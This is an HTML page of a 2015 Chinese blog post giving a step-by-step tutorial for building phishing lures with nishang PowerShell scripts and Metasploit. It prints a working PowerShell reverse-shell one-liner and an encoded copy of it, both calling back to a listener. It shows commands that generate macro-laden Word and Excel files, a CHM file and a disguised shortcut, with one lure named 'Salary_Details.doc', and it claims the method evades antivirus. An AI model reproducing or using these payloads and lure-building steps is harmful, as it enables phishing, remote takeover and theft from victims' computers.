<!doctype html>
<html class="theme-next   use-motion ">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css"/>




  
    <link href='//fonts.lug.ustc.edu.cn/css?family=Lato:300,400,700,400italic&subset=latin,latin-ext' rel='stylesheet' type='text/css'>
  



<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=0.4.5.2" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="linux," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=0.4.5.2" />






<meta name="description" content="###0x00 简介


Powershell是windows下面非常强大的命令行工具，并且在windows中Powershell可以利用.NET Framework的强大功能，也可以调用windows API，在win7/server 2008以后，powershell已被集成在系统当中。 除此之外，使用powershell能很好的bypass各种AV，在渗透测试中可谓是一个神器。此次使用的是开">
<meta property="og:type" content="article">
<meta property="og:title" content="使用powershell Client进行有效钓鱼">
<meta property="og:url" content="http://yoursite.com/2015/11/07/使用powershell-Client进行有效钓鱼/index.html">
<meta property="og:site_name" content="TIME">
<meta property="og:description" content="###0x00 简介


Powershell是windows下面非常强大的命令行工具，并且在windows中Powershell可以利用.NET Framework的强大功能，也可以调用windows API，在win7/server 2008以后，powershell已被集成在系统当中。 除此之外，使用powershell能很好的bypass各种AV，在渗透测试中可谓是一个神器。此次使用的是开">
<meta property="og:image" content="http://yoursite.com/images/1.png">
<meta property="og:image" content="http://yoursite.com/images/3.png">
<meta property="og:image" content="http://yoursite.com/images/4.png">
<meta property="og:image" content="http://yoursite.com/images/5.png">
<meta property="og:image" content="http://yoursite.com/images/6.png">
<meta property="og:image" content="http://yoursite.com/images/7.png">
<meta property="og:updated_time" content="2015-11-07T04:47:39.473Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="使用powershell Client进行有效钓鱼">
<meta name="twitter:description" content="###0x00 简介


Powershell是windows下面非常强大的命令行工具，并且在windows中Powershell可以利用.NET Framework的强大功能，也可以调用windows API，在win7/server 2008以后，powershell已被集成在系统当中。 除此之外，使用powershell能很好的bypass各种AV，在渗透测试中可谓是一个神器。此次使用的是开">



<script type="text/javascript" id="hexo.configuration">
  var CONFIG = {
    scheme: '',
    sidebar: 'always',
    motion: true
  };
</script>

  <title> 使用powershell Client进行有效钓鱼 | TIME </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  <!--[if lte IE 8]>
  <div style=' clear: both; height: 59px; padding:0 0 0 15px; position: relative;margin:0 auto;'>
    <a href="http://windows.microsoft.com/en-US/internet-explorer/products/ie/home?ocid=ie6_countdown_bannercode">
      <img src="http://7u2nvr.com1.z0.glb.clouddn.com/picouterie.jpg" border="0" height="42" width="820"
           alt="You are using an outdated browser. For a faster, safer browsing experience, upgrade for free today or use other browser ,like chrome firefox safari."
           style='margin-left:auto;margin-right:auto;display: block;'/>
    </a>
  </div>
<![endif]-->
  






  <div class="container one-column page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">TIME</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle"></p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu ">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-home fa-fw"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-th fa-fw"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-user fa-fw"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-archive fa-fw"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-tags fa-fw"></i> <br />
            
            标签
          </a>
        </li>
      

      
      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div id="content" class="content">
          

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                使用powershell Client进行有效钓鱼
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            发表于
            <time itemprop="dateCreated" datetime="2015-11-07T12:26:39+08:00" content="2015-11-07">
              2015-11-07
            </time>
          </span>

          

          
            
          

          

        </div>
      </header>
    


    <div class="post-body">

      
      

      
        <span itemprop="articleBody"><p>###0x00 简介</p>
<hr>
<ul>
<li>Powershell是windows下面非常强大的命令行工具，并且在windows中Powershell可以利用.NET Framework的强大功能，也可以调用windows API，在win7/server 2008以后，powershell已被集成在系统当中。 除此之外，使用powershell能很好的bypass各种AV，在渗透测试中可谓是一个神器。此次使用的是开源的powershell脚本集nishang中的client来制作钓鱼文件。其中office类型文件可以达到钓鱼目的的前提是office已经启用宏。</li>
</ul>
<hr>
<p>###0x01制作word钓鱼文件</p>
<hr>
<ul>
<li>加载powercat ：</li>
</ul>
<p>PS G:\github\Pentest\powershell\powercat-master&gt; . .\powercat.ps1<br>PS G:\github\Pentest\powershell\powercat-master&gt; powercat<br>You must select either client mode (-c) or listen mode (-l).<br>加载以后使用powercat开启监听：</p>
<p>PS G:\github\Pentest\powershell\powercat-master&gt; powercat -l -v -p 4444<br>详细信息: Set Stream 1: TCP<br>详细信息: Set Stream 2: Console<br>详细信息: Setting up Stream 1…<br>详细信息: Listening on [0.0.0.0] (port 4444)</p>
<p>执行结果如下图：</p>
<p><img src="/images/1.png" alt="Alt text"></p>
<p>可以发现，直接获取了一个powershell的shell。下面制作word文件。 复制nishang中Invoke-PowerShellTcpOneLine.ps1 client代码，如下：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$client = New-<span class="built_in">Object</span> System.Net.Sockets.TCPClient(<span class="string">"192.168.52.129"</span>,<span class="number">4444</span>);$stream = $client.GetStream();[byte[]]$bytes = <span class="number">0.</span><span class="number">.65535</span>|%&#123;<span class="number">0</span>&#125;;<span class="keyword">while</span>(($i = $stream.Read($bytes, <span class="number">0</span>, $bytes.Length)) -ne <span class="number">0</span>)&#123;;$data = (New-<span class="built_in">Object</span> -TypeName System.Text.ASCIIEncoding).GetString($bytes,<span class="number">0</span>, $i);$sendback = (iex $data <span class="number">2</span>&gt;&amp;<span class="number">1</span> | Out-<span class="built_in">String</span> );$sendback2  = $sendback + <span class="string">"PS "</span> + (pwd).Path + <span class="string">"&gt; "</span>;$sendbyte = (::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,<span class="number">0</span>,$sendbyte.Length);$stream.Flush()&#125;;$client.Close()</span><br></pre></td></tr></table></figure>
<p>使用Invoke-Encode.ps1进行编码,编码之前记得要修改ip以及自己要监听的端口:</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">PS G:\github\Pentest\powershell\nishang-master\Shells&gt; cd ..\Utility\</span><br><span class="line">PS G:\github\Pentest\powershell\nishang-master\Utility&gt; . .\Invoke-Encode.ps1</span><br><span class="line">PS G:\github\Pentest\powershell\nishang-master\Utility&gt; Invoke-Encode -DataToEncode '$client = New-Object System.Net.Sockets.TCPClient("192.1</span><br><span class="line">68.52.129",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%&#123;0&#125;;while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)&#123;;$da</span><br><span class="line">ta = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2  = $sendb</span><br><span class="line">ack + "PS " + (pwd).Path + "&gt; ";$sendbyte = (::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream</span><br><span class="line">.Flush()&#125;;$client.Close()' -IsString -PostScriptCommand</span><br><span class="line">Encoded data written to .\encoded.txt</span><br><span class="line">Encoded command written to .\encodedcommand.txt</span><br></pre></td></tr></table></figure>
<p>复制encodedcommand.txt的代码如下：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Invoke-Expression $(New-<span class="built_in">Object</span> IO.StreamReader ($(New-<span class="built_in">Object</span> IO.Compression.DeflateStream ($(New-<span class="built_in">Object</span> IO.MemoryStream (,$([Convert]::FromBase64String(<span class="string">'TVHNasJAEL4X+g5DSMsuNUtMG6mGCm1oi1CiNEIP4mFNBpMao5gRFfXdu5uY1L3MMHx/M2tGWYo5wQsEuLOGs1+MCMJDQbgUAZIIV9ECqRBjf+SXSGa0u45od56Fq4rTNVpP6nHPLGiDcqmEzEpSfCKF5YxxbzI7EE6mU1PXQoFsITqu++ie7o722dslaYaMmammV0LiG2XMKnwL7BZUrfjCfE4J52DlCDY/emYsSSoeu1rAGh/WGMgl1quMcU/iNfQHg/c8WsVpPueXfKqtXbRJqjfBPJ7JaKFFU9xD5eD079twguGWrIoGV1AHyuQ18QGMUQiGqmy9i7kYSUr0sA/GhaMMtfyEdDC8ZJr2emXGMtubzsT+HZoTi59NSsgaHZW76evzNNiPbFskjJ+9+lf8bFUg47c3fw=='</span>)))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();</span><br></pre></td></tr></table></figure>
<p>加载Out-Word.ps1并生成后门，这里要注意，要把payload里面的单引号多加一个单引号！</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">PS G:\github\Pentest\powershell\nishang-master\Utility&gt; . ..\Client\Out-Word.ps1</span><br><span class="line">PS G:\github\Pentest\powershell\nishang-master\Utility&gt; Out-Word -Payload <span class="string">'powershell -c Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('</span><span class="string">'TVHNasJAEL4X+g5DSMsuNUtMG6mGCm1oi1CiNEIP4mFNBpMao5gRFfXdu5uY1L3MMHx/M2tGWYo5wQsEuLOGs1+MCMJDQbgUAZIIV9ECqRBjf+SXSGa0u45od56Fq4rTNVpP6nHPLGiDcqmEzEpSfCKF5YxxbzI7EE6mU1PXQoFsITqu++ie7o722dslaYaMmammV0LiG2XMKnwL7BZUrfjCfE4J52DlCDY/emYsSSoeu1rAGh/WGMgl1quMcU/iNfQHg/c8WsVpPueXfKqtXbRJqjfBPJ7JaKFFU9xD5eD079twguGWrIoGV1AHyuQ18QGMUQiGqmy9i7kYSUr0sA/GhaMMtfyEdDC8ZJr2emXGMtubzsT+HZoTi59NSsgaHZW76evzNNiPbFskjJ+9+lf8bFUg47c3fw=='</span><span class="string">')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();'</span></span><br><span class="line">Saved to file G:\github\Pentest\powershell\nishang-master\Utility\Salary_Details.doc</span><br><span class="line"><span class="number">0</span></span><br><span class="line">PS G:\github\Pentest\powershell\nishang-master\Utility&gt;</span><br></pre></td></tr></table></figure>
<p>执行word以后，则会反弹shell，在启用宏的计算机上没有任何提示，未启用宏的计算机会有启用宏的提示。</p>
<p><a href="/images/2.png">Alt text</a><br>获取反弹的powershell可以很容易的升级到metasploit的meterpreter。</p>
<hr>
<p>###0x02制作excel钓鱼文件</p>
<hr>
<p>首先使用msf的web_delivery开启一个powershell的监听：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">#bash</span><br><span class="line">msf &gt; use exploit/multi/script/web_delivery </span><br><span class="line">msf exploit(web_delivery) &gt; set target 2</span><br><span class="line">target =&gt; 2</span><br><span class="line">msf exploit(web_delivery) &gt; set payload windows/meterpreter/reverse_tcp</span><br><span class="line">payload =&gt; windows/meterpreter/reverse_tcp</span><br><span class="line">msf exploit(web_delivery) &gt; set LHOST 192.168.52.129</span><br><span class="line">LHOST =&gt; 192.168.52.129</span><br><span class="line">msf exploit(web_delivery) &gt; set URIPATH /</span><br><span class="line">URIPATH =&gt; </span><br><span class="line">msf exploit(web_delivery) &gt; exploit</span><br></pre></td></tr></table></figure>
<p>开启服务如下图：</p>
<p><img src="/images/3.png" alt="Alt text"></p>
<p>使用Out-Excel.ps1制作excel钓鱼文件:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">D:\temp&gt;powershell</span><br><span class="line">Windows PowerShell</span><br><span class="line">版权所有 (C) <span class="number">2015</span> Microsoft Corporation。保留所有权利。    </span><br><span class="line"></span><br><span class="line">PS D:\temp&gt; . .\Out-Excel.ps1</span><br><span class="line">PS D:\temp&gt; Out-Excel -PayloadURL http:<span class="comment">//192.168.52.129:8080/ -OutputFile  D:\temp\test.xls</span></span><br><span class="line">Saved to file D:\temp\test.xls</span><br><span class="line"><span class="number">0</span></span><br></pre></td></tr></table></figure>
<p>其中<a href="http://192.168.52.129:8080/是msf开启的服务地址。" target="_blank" rel="external">http://192.168.52.129:8080/是msf开启的服务地址。</a> 运行excel，获取meterpreter会话如下图：</p>
<p><img src="/images/4.png" alt="Alt text"></p>
<hr>
<p>###0x03制作chm钓鱼文件</p>
<hr>
<p>依然使用msf开启powershell的web_delivery，使用Out-CHM制作chm钓鱼文件：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">PS D:\temp&gt; Out-CHM -PayloadURL http:<span class="comment">//192.168.52.129:8080/ -HHCPath "C:\Program Files (x86)\HTML Help Workshop"</span></span><br><span class="line">Microsoft HTML Help Compiler <span class="number">4.74</span><span class="number">.8702</span>    </span><br><span class="line"></span><br><span class="line">Compiling d:\temp\doc.chm    </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Compile time: <span class="number">0</span> minutes, <span class="number">1</span> second</span><br><span class="line"><span class="number">2</span>       Topics</span><br><span class="line"><span class="number">4</span>       Local links</span><br><span class="line"><span class="number">4</span>       Internet links</span><br><span class="line"><span class="number">0</span>       Graphics    </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Created d:\temp\doc.chm, <span class="number">13</span>,<span class="number">524</span> bytes</span><br><span class="line">Compression increased file by <span class="number">324</span> bytes.</span><br><span class="line">PS D:\temp&gt;</span><br></pre></td></tr></table></figure>
<p>运行doc.chm,获取meterpreter会话:</p>
<p><img src="/images/5.png" alt="Alt text"></p>
<hr>
<p>###0x04制作快捷方式钓鱼文件</p>
<hr>
<p>依然使用之前开启的web_delivery,使用Out-Shortcut制作快捷方式钓鱼文件。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PS D:\temp&gt; . .\Out-Shortcut.ps1</span><br><span class="line">PS D:\temp&gt; Out-Shortcut -PayloadURL http:<span class="comment">//192.168.52.129:8080/ -HotKey 'F3' -Icon 'notepad.exe'</span></span><br><span class="line">The Shortcut file has been written <span class="keyword">as</span> D:\temp\Shortcut to File Server.lnk</span><br></pre></td></tr></table></figure>
<p>其中PayloadURL为web_delivery服务地址，Icon为快捷方式的图标，HotKey为快捷键。 右键属性快捷方式，可以看到快捷方式指向我们的服务地址，如下图：</p>
<p><img src="/images/6.png" alt="Alt text"></p>
<p>运行快捷方式，可以获取meterpreter会话：</p>
<p><img src="/images/7.png" alt="Alt text"></p>
<hr>
<p>###0x05小结</p>
<hr>
<p>*测试发现，上面几个方式还是挺有效的，使用chm方式更容易成功些，因为使用了powershell，防护软件并没有报警，其中还有WebQuery、java以及hta类型的钓鱼文件生成脚本，笔者测试java以及hta方式的没有成功，这里就不介绍了，至于WebQuery方式的在FB上已经有详细的介绍有兴趣的小伙伴可以继续研究研究。</p>
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="330" height="86" src="http://music.163.com/outchain/player?type=2&id=21312012&auto=1&height=66"></iframe></span>
      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/linux/" rel="tag">#linux</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2015/11/06/一个学号能查上万师生信息-高校网站漏洞一年现2868个/" rel="next" title="一个学号能查上万师生信息 高校网站漏洞一年现2868个">
                <i class="fa fa-chevron-left"></i> 一个学号能查上万师生信息 高校网站漏洞一年现2868个
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


        </div>

        


        
  <div class="comments" id="comments">
    
  </div>


      </div>

      
        
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" src="http://images.forwallpaper.com/files/thumbs/preview/86/869652__security-wallpaper-hacker-art-securityhacker_p.jpg" alt="NEMO" itemprop="image"/>
          <p class="site-author-name" itemprop="name">NEMO</p>
        </div>
        <p class="site-description motion-element" itemprop="description">多么期待一场慰藉的暴雨，Oh how I wish for soothing rain.</p>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">4</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          <div class="site-state-item site-state-categories">
            <a href="/categories">
              <span class="site-state-item-count">0</span>
              <span class="site-state-item-name">分类</span>
              </a>
          </div>

          <div class="site-state-item site-state-tags">
            <a href="/tags">
              <span class="site-state-item-count">2</span>
              <span class="site-state-item-name">标签</span>
              </a>
          </div>

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="http://butian.360.cn/" target="_blank">
                  
                    <i class="fa fa-globe"></i> 360
                  
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://douban.com/" target="_blank">
                  
                    <i class="fa fa-globe"></i> douban
                  
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://www.zhihu.com/" target="_blank">
                  
                    <i class="fa fa-globe"></i> zhihu
                  
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://www.baidu.com/" target="_blank">
                  
                    <i class="fa fa-globe"></i> baidu
                  
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://wooyun.org/" target="_blank">
                  
                    <i class="fa fa-globe"></i> wooyun
                  
                </a>
              </span>
            
          
        </div>

        
        

        <div class="links-of-author motion-element">
          
        </div>

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc-indicator-top post-toc-indicator">
            <i class="fa fa-angle-double-up"></i>
          </div>
          <div class="post-toc">
            
              
            
            
              <p class="post-toc-empty">此文章未包含目录</p>
            
          </div>
          <div class="post-toc-indicator-bottom post-toc-indicator">
            <i class="fa fa-angle-double-down"></i>
          </div>
        </section>
      

    </div>
  </aside>


      
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2015</span>
  <span class="with-love">
    <i class="icon-next-heart fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">NEMO</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="http://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT
  </a>
</div>



      </div>
    </footer>

    <div class="back-to-top"></div>
  </div>

  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  

  
    
    

  


  

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js"></script>
  <script type="text/javascript" src="/js/fancy-box.js?v=0.4.5.2"></script>


  <script type="text/javascript" src="/js/helpers.js?v=0.4.5.2"></script>
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js"></script>
<script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js"></script>

<script type="text/javascript" src="/js/motion.js?v=0.4.5.2" id="motion.global"></script>


  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  
<script type="text/javascript" src="/js/bootstrap.scrollspy.js?v=0.4.5.2" id="bootstrap.scrollspy.custom"></script>


<script type="text/javascript" id="sidebar.toc.highlight">
  $(document).ready(function () {
    var tocSelector = '.post-toc';
    var $tocSelector = $(tocSelector);
    var activeCurrentSelector = '.active-current';

    $tocSelector
      .on('activate.bs.scrollspy', function () {
        var $currentActiveElement = $(tocSelector + ' .active').last();

        removeCurrentActiveClass();
        $currentActiveElement.addClass('active-current');

        $tocSelector[0].scrollTop = $currentActiveElement.position().top;
      })
      .on('clear.bs.scrollspy', function () {
        removeCurrentActiveClass();
      });

    function removeCurrentActiveClass () {
      $(tocSelector + ' ' + activeCurrentSelector)
        .removeClass(activeCurrentSelector.substring(1));
    }

    function processTOC () {
      getTOCMaxHeight();
      toggleTOCOverflowIndicators();
    }

    function getTOCMaxHeight () {
      var height = $('.sidebar').height() -
                   $tocSelector.position().top -
                   $('.post-toc-indicator-bottom').height();

      $tocSelector.css('height', height);

      return height;
    }

    function toggleTOCOverflowIndicators () {
      tocOverflowIndicator(
        '.post-toc-indicator-top',
        $tocSelector.scrollTop() > 0 ? 'show' : 'hide'
      );

      tocOverflowIndicator(
        '.post-toc-indicator-bottom',
        $tocSelector.scrollTop() >= $tocSelector.find('ol').height() - $tocSelector.height() ? 'hide' : 'show'
      )
    }

    $(document).on('sidebar.motion.complete', function () {
      processTOC();
    });

    $('body').scrollspy({ target: tocSelector });
    $(window).on('resize', function () {
      if ( $('.sidebar').hasClass('sidebar-active') ) {
        processTOC();
      }
    });

    onScroll($tocSelector);

    function onScroll (element) {
      element.on('mousewheel DOMMouseScroll', function (event) {
          var oe = event.originalEvent;
          var delta = oe.wheelDelta || -oe.detail;

          this.scrollTop += ( delta < 0 ? 1 : -1 ) * 30;
          event.preventDefault();

          toggleTOCOverflowIndicators();
      });
    }

    function tocOverflowIndicator (indicator, action) {
      var $indicator = $(indicator);
      var opacity = action === 'show' ? 1 : 0;
      $indicator.velocity ?
        $indicator.velocity('stop').velocity({
          opacity: opacity
        }, { duration: 100 }) :
        $indicator.stop().animate({
          opacity: opacity
        }, 100);
    }

  });
</script>

<script type="text/javascript" id="sidebar.nav">
  $(document).ready(function () {
    var html = $('html');
    var TAB_ANIMATE_DURATION = 200;
    var hasVelocity = $.isFunction(html.velocity);

    $('.sidebar-nav li').on('click', function () {
      var item = $(this);
      var activeTabClassName = 'sidebar-nav-active';
      var activePanelClassName = 'sidebar-panel-active';
      if (item.hasClass(activeTabClassName)) {
        return;
      }

      var currentTarget = $('.' + activePanelClassName);
      var target = $('.' + item.data('target'));

      hasVelocity ?
        currentTarget.velocity('transition.slideUpOut', TAB_ANIMATE_DURATION, function () {
          target
            .velocity('stop')
            .velocity('transition.slideDownIn', TAB_ANIMATE_DURATION)
            .addClass(activePanelClassName);
        }) :
        currentTarget.animate({ opacity: 0 }, TAB_ANIMATE_DURATION, function () {
          currentTarget.hide();
          target
            .stop()
            .css({'opacity': 0, 'display': 'block'})
            .animate({ opacity: 1 }, TAB_ANIMATE_DURATION, function () {
              currentTarget.removeClass(activePanelClassName);
              target.addClass(activePanelClassName);
            });
        });

      item.siblings().removeClass(activeTabClassName);
      item.addClass(activeTabClassName);
    });

    $('.post-toc a').on('click', function (e) {
      e.preventDefault();
      var targetSelector = escapeSelector(this.getAttribute('href'));
      var offset = $(targetSelector).offset().top;
      hasVelocity ?
        html.velocity('stop').velocity('scroll', {
          offset: offset  + 'px',
          mobileHA: false
        }) :
        $('html, body').stop().animate({
          scrollTop: offset
        }, 500);
    });

    // Expand sidebar on post detail page by default, when post has a toc.
    motionMiddleWares.sidebar = function () {
      var $tocContent = $('.post-toc-content');
      if (CONFIG.sidebar === 'post') {
        if ($tocContent.length > 0 && $tocContent.html().trim().length > 0) {
          displaySidebar();
        }
      }
    };
  });
</script>



  <script type="text/javascript" src="/js/bootstrap.js"></script>

  
  

  
  

</body>
</html>
